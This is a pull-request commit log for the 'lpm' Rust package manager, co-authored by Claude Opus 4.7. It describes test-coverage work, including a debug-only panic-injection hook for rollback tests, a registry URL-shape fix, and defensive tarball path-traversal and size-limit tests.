- Plan #3: flow_install_patch_patch_commit_install_persists_patch
- Plan #4: flow_token_rotate_publish_dry_run_picks_new_token
- Plan #6: flow_install_upgrade_major_audit_picks_new_version

Pre-merge gate green: clippy --workspace --all-targets clean, fmt
clean, fancy-regex empty, 6455/6455 nextest pass (was 6454; +1 for
the new flow). Plan #5 stable across 5/5 reruns at ~0.11s each.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(install): LPM_TEST_PANIC_AT hook + B.4 panic-rollback contract

Adds a deterministic panic-injection hook to the install pipeline +
unblocks the long-deferred B.4 contract test for ManifestTransaction
Drop-based rollback on panic.

The hook (`maybe_test_panic(stage)` in
crates/lpm-cli/src/commands/install.rs) reads LPM_TEST_PANIC_AT and
panics when the env value matches the stage name. Gated to
`cfg!(debug_assertions) || LPM_TEST_MODE=1` — same pattern as the
#78 retry-backoff override. Production builds without LPM_TEST_MODE=1
silently treat the env as no-op.

Wired 4 stages in `run_add_packages`:
- "after-snapshot" — manifest unchanged; Drop is no-op
- "after-stage" — placeholder `*` written to package.json (load-bearing)
- "after-install" — pipeline complete; manifest still has `*`
- "after-finalize" — concrete versions written; pre-commit only
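
A sketch of the hook's gating logic, assuming it compares the requested stage against the current one and panics on a match. The real `maybe_test_panic(stage)` reads LPM_TEST_PANIC_AT and LPM_TEST_MODE from the environment; here they are passed in as `requested` and `test_mode` (both hypothetical parameters) to keep the example deterministic, and the panic message format is an assumption.

```rust
/// Panics when the requested stage matches the current stage and the gate is
/// open (debug build or explicit test mode). Otherwise a no-op.
fn maybe_test_panic(stage: &str, requested: Option<&str>, test_mode: bool) {
    if !(cfg!(debug_assertions) || test_mode) {
        return;
    }
    if requested == Some(stage) {
        panic!("LPM_TEST_PANIC_AT={stage}");
    }
}
```

Calling it at each of the four stages with the same `requested` value means exactly one call site can fire per run, which is what makes the injection point deterministic.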

The hook unblocks B.4 (`install_panics_mid_pipeline_rollback_restores_manifest`),
deferred since the original Item 2 tranche because there was no
deterministic way to trigger a panic mid-install from a workflow
test. Recoverable errors fire `?`-rollback (covered by E.1/E.2/E.3);
SIGKILL bypasses Drop entirely (B.1/B.2/B.3 cover that). The panic
path was the missing rollback proof.

B.4 sets LPM_TEST_PANIC_AT=after-stage and asserts:
- process exits non-zero (panic propagates to runtime)
- stderr contains `"panicked at"` AND `"LPM_TEST_PANIC_AT=after-stage"`
- package.json BYTE-IDENTICAL to pre-stage (Drop ran on unwind, snapshot
  bytes restored — load-bearing)
- the new pkg is NOT in dependencies (placeholder rollback worked)
- .lpm/install-hash absent (invalidate-on-rollback)
- lpm.lock absent (matched optional snapshot's None pre-state)

Catches a regression where:
- panic = "abort" added to release profile (no Drop on panic)
- ManifestTransaction Drop logic stops restoring snapshot bytes
- The `lpm install` snapshot+commit window grows without re-wiring Drop
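
The Drop-based rollback that B.4 pins can be sketched as a small guard type. This is an illustration only: the field names, `begin`, and `commit` are assumptions, and the real `ManifestTransaction` also covers lpm.lock and install-hash state that is omitted here.

```rust
use std::fs;
use std::io;
use std::path::{Path, PathBuf};

/// Snapshots a manifest on creation and restores it on drop unless committed.
struct ManifestTransaction {
    path: PathBuf,
    snapshot: Vec<u8>,
    committed: bool,
}

impl ManifestTransaction {
    fn begin(path: &Path) -> io::Result<Self> {
        Ok(Self {
            path: path.to_path_buf(),
            snapshot: fs::read(path)?,
            committed: false,
        })
    }

    /// Marks the edit as final; the subsequent drop becomes a no-op.
    fn commit(mut self) {
        self.committed = true;
    }
}

impl Drop for ManifestTransaction {
    fn drop(&mut self) {
        if !self.committed {
            // Best effort: Drop cannot return an error.
            let _ = fs::write(&self.path, &self.snapshot);
        }
    }
}
```

The guard only helps while panics unwind. With `panic = "abort"` the process ends without running `drop`, which is the first regression listed above.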

Test runs in 0.07s warm. 5/5 stable across reruns.

Pre-merge gate green: clippy --workspace --all-targets clean, fmt
clean, fancy-regex empty, 6456/6456 nextest pass (was 6455; +1 for B.4).
install_concurrency now at 19/19. Item 2 of test-coverage-followup-plan
moves to 19/21 — only A.2 (no contract) and D.3 (needs container
infra) remain deferred indefinitely.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(workflows): align MockRegistry tarball URL shape with production /-/ gate

Workflow tests mounted tarballs at `/tarballs/{name}-{version}.tgz` —
missing the `/-/` path segment that the registry-client's `evaluate_cached_url`
gate at [crates/lpm-registry/src/client.rs#L4117] requires (`.tgz` suffix
AND `/-/` substring). The gate is a defense-in-depth check that blocks
the H1 auth-token leak: a tampered lockfile URL like `/api/admin/foo.tgz`
(no `/-/`) would otherwise attach the bearer to a non-registry endpoint.

The mismatch produced two test-environment side effects that don't manifest
in production:

1. **WARN noise**: every install test that read a tarball URL from the
   lockfile fast path logged `cached tarball URL for X@Y failed shape check;
   falling back to on-demand lookup`. Polluted stderr across the suite.
2. **`shape_mismatch_count` defeated**: the registry-client documents this
   counter as a "BUG signal — the writer should never emit a gate-rejectable
   URL". Test runs incremented it on every install, making the counter
   useless for catching real bugs.

This commit migrates the mock to the production-shape
`/tarballs/{name}/-/{name}-{version}.tgz` everywhere — both the helper
methods (`MockRegistry::tarball_path` / `tarball_url`) and the ~60
hard-coded `format!` sites across 14 test files + 1 snapshot.

The new `tarball_path` helper is `pub` with a prominent docstring warning
future test authors not to re-introduce the legacy shape. Internal mounts
in `with_package_and_deps` / `with_package_published_at` /
`with_full_package_metadata` all route through it.
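
A minimal sketch of what such a helper could look like, assuming it is a plain string formatter over the production shape quoted above. The free-function form and the argument types are assumptions; the real `MockRegistry::tarball_path` may differ.

```rust
/// Hypothetical free-function version of the mock helper. Builds the
/// production-shape path `/tarballs/{name}/-/{name}-{version}.tgz`.
/// Do not reintroduce the legacy `/tarballs/{name}-{version}.tgz` shape.
pub fn tarball_path(name: &str, version: &str) -> String {
    format!("/tarballs/{name}/-/{name}-{version}.tgz")
}
```

Routing every mount and every hard-coded URL through one formatter keeps the mock and the gate's expectations from drifting apart again.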

Post-fix verification: WARN gone, gate `Accepted` path runs, all 691
lpm-workflows tests pass (0 leaky in the latest full-workspace run, down
from 1-3 leaky pre-fix — fewer fallback paths firing).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(workflows): test-coverage-followup tranche — Items 2/3/4/5

Closes the remaining open rows from `private/test-coverage-followup-plan.md`
across four items. ~2,600 LOC of new test code + fixture + budget infra.

**Item 3 — tarball-security additional candidate surfaces (7 tests
in `tarball_security.rs`):**

- `tarball_with_pax_path_traversal_rejected` — PAX extended `path`
  header smuggling `..` is rejected by the extractor's `Component::ParentDir`
  check after the tar crate resolves the override.
- `tarball_with_gnu_longname_traversal_rejected` — symmetric GNU `L`
  entry; same rejection path.
- `tarball_rejects_or_rolls_back_when_later_entry_is_malicious` — pins
  the `rollback_extraction` contract: valid first entry is cleaned up
  when a later `..`-traversal entry trips rejection mid-stream.
- `tarball_with_duplicate_member_path_rejected_or_deterministic` — pins
  current last-write-wins contract (defensible; flagged scanner-
  disagreement risk in test comment).
- `tarball_with_truncated_gzip_rolls_back_partial_extract` — half-
  truncated gzip stream → libdeflate fails cleanly → no partial extract.
- `tarball_ignores_uid_gid_ownership_metadata` (POSIX) — bogus uid/gid
  in tar header is ignored; extracted files owned by process uid.
- `tarball_with_sparse_huge_file_rejected_by_declared_size` — manually-
  constructed tarball with header declaring `MAX_FILE_SIZE + 1` and
  empty on-wire body; extractor rejects on the pre-check at lib.rs:306
  before draining body.
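
The two rejection paths these tests lean on (the `Component::ParentDir` check and the declared-size pre-check) can be sketched as one pre-extraction function. This is an assumption-laden illustration: `precheck_entry`, the `Rejection` enum, and the `max_file_size` parameter are hypothetical names, and the actual value of `MAX_FILE_SIZE` is not stated in this commit.

```rust
use std::path::{Component, Path};

/// Hypothetical rejection reasons; the real extractor's error type is not shown.
#[derive(Debug, PartialEq, Eq)]
pub enum Rejection {
    ParentDirTraversal,
    DeclaredSizeTooLarge,
}

/// Checks one tar entry before any body bytes are read.
/// `path` is the entry path after PAX / GNU long-name overrides are resolved.
pub fn precheck_entry(
    path: &Path,
    declared_size: u64,
    max_file_size: u64,
) -> Result<(), Rejection> {
    // Reject any `..` component, wherever it appears in the path.
    if path.components().any(|c| matches!(c, Component::ParentDir)) {
        return Err(Rejection::ParentDirTraversal);
    }
    // Reject on the header's declared size, so a sparse or empty body
    // cannot slip past a check that only counts on-wire bytes.
    if declared_size > max_file_size {
        return Err(Rejection::DeclaredSizeTooLarge);
    }
    Ok(())
}
```

Because the check runs on the resolved path, the PAX `path` and GNU `L` cases reduce to the same rejection as a plain `..` entry.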

**Item 4 — cross-command flows additional candidate surfaces (2 tests
in `cross_command_flows.rs`):**

- `flow_install_uninstall_install_graph_round_trip` — pins manifest /
  link / graph hand-off through a full round-trip.
- `flow_cache_clean_then_offline_install_uses_store_or_fails_helpfully` —
  pins the cache/store boundary: `cache clean` must not corrupt offline
  install; store-side bytes byte-identical after a clean.

**Item 2 — concurrency/recovery additional candidate surfaces (3 tests
in `install_concurrency.rs`):**

- `cache_clean_during_slow_tarball_install_does_not_corrupt_install`
  (G.4) — install + cache clean run concurrently (different lock paths,
  no serialization); install succeeds despite metadata cache wipe
  mid-stream. Empirical timing observed: install elapsed 1.57s, cache
  clean fired at t=30-39ms cleanly inside the install window.
- `install_panics_after_install_hash_write_rollback_invalidates_hash`
  (G.5) — reuses existing `LPM_TEST_PANIC_AT=after-install` stage (no
  new source-side hook needed — `write_post_install_v6_hash` runs
  inside `run_with_options` which returns BEFORE that stage fires).
  Pins that Drop-based rollback restores manifest AND deletes the
  freshly-written install-hash.
- `malformed_registry_json_fails_without_manifest_or_lockfile_mutation`
  (G.6) — truncated JSON on all three metadata endpoints; install
  fails cleanly, no panic/backtrace, package.json byte-identical, no
  torn lockfile.

**Verdaccio-npm parity for `which@4.0.0`
(`install_real_registry.rs`):**

- `verdaccio_npm_parity_for_bin_package_pins_metadata_and_shim_presence`
  — extends the existing lodash byte-diff with a bin-shipping target
  package. Asserts metadata equivalence + `.bin/<name>` shim present
  on both sides + bin target file materialized + exec bits non-zero
  (POSIX).

**Item 5 — realworld fidelity (new fixture + new test file):**

- `tests/fixtures/realworld-nextjs/` (package.json + README) — pinned
  Next.js 14.2.13 + React 18.3.1 + TypeScript 5.6.3 + 3 `@types/*`
  packages. Resolves to ~28 transitive deps empirically. README
  documents the calibration methodology including raw measurement data.
- `tests/workflows/tests/install_realworld.rs` — `install_realworld_nextjs_fixture_succeeds_through_verdaccio`
  installs the fixture through Verdaccio→npmjs and asserts end-to-end
  success at production scale. Always logs cold + warm wall-clock + peak
  RSS to stderr for calibration data.
- **`LPM_BUDGET_GATE=1`-gated budget assertions**: cold ≤ 25s, warm ≤
  25ms, cold peak RSS ≤ 1500 MiB. Calibrated from N=6 cold + N=3 warm +
  N=3 RSS runs on M-series macOS, 2026-05-14. Memory measurement via
  `/usr/bin/time -l` (macOS) / `-v` (Linux); Windows skips with a clear
  warning.
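
The "always log, assert only when gated" pattern described above might look like the following sketch. Only the `LPM_BUDGET_GATE=1` variable comes from this commit; the function names and the log format are hypothetical.

```rust
use std::env;
use std::time::Duration;

/// Returns true only when `LPM_BUDGET_GATE` is set to exactly "1".
pub fn budget_gate_enabled() -> bool {
    env::var("LPM_BUDGET_GATE").map(|v| v == "1").unwrap_or(false)
}

/// Hypothetical helper: always logs the measurement for calibration,
/// but reports a budget violation only when `gate` is true.
pub fn check_budget(
    label: &str,
    measured: Duration,
    budget: Duration,
    gate: bool,
) -> Result<(), String> {
    eprintln!("[calibration] {label}: {measured:?} (budget {budget:?})");
    if gate && measured > budget {
        return Err(format!("{label} exceeded budget: {measured:?} > {budget:?}"));
    }
    Ok(())
}
```

A test would call something like `check_budget("cold", elapsed, Duration::from_secs(25), budget_gate_enabled())` and unwrap the result, so ungated runs still emit calibration data without failing on slow hardware.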

This closes Item 5 entirely (all 4 acceptance criteria green) and brings
Items 2/3/4 to the parked-by-design or infrastructure-blocked baseline.

CI gate: clippy `--workspace --all-targets -- -D warnings` clean, fmt
clean, fancy-regex empty, build clean, `cargo nextest run --workspace`
6471/6471 pass. Suite runtime ~2:40 (was ~2:24 pre-tranche; +15s for the
realworld test).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(workflows): collapse Linux-only nested `if let` into a let-chain in parse_peak_rss

CI lint on Linux failed on `clippy::collapsible_if` in the Linux-cfg'd
branch of `parse_peak_rss`. The local clippy run on macOS didn't catch
this because only the macOS-cfg branch compiles there, and that branch
has an intermediate `let bytes_str = rest.trim();` between its two
`if let`s, so the lint does not apply to it.

Collapse the Linux branch to use `&&` (stable let-chains) so it
satisfies the lint while preserving the same semantics.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request May 16, 2026
Strip phase numbers, trial labels, and date stamps from comments per
the comment-cleanup plan. Keep all load-bearing technical content
(libdeflate rationale, parent-dir memoization, exec-bit handling,
0o644-floor normalization). Pure comment edits, no code changes.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request May 16, 2026
Strip phase/trial/audit-finding labels and date stamps from comments,
rewrite the surviving doc blocks to be concise and load-bearing.
Pure comment edits, no code changes. Net −154 lines.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request May 16, 2026
Strip phase/audit-finding labels and date stamps; rewrite doc blocks
to be concise and load-bearing. Rename ambiguous `Phase 1/2/3/4`
intra-linker pipeline references to `Stage 1/2/3/4` so they don't
read like roadmap-phase numbers. Pure comment edits, no code changes.
Net −70 lines.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>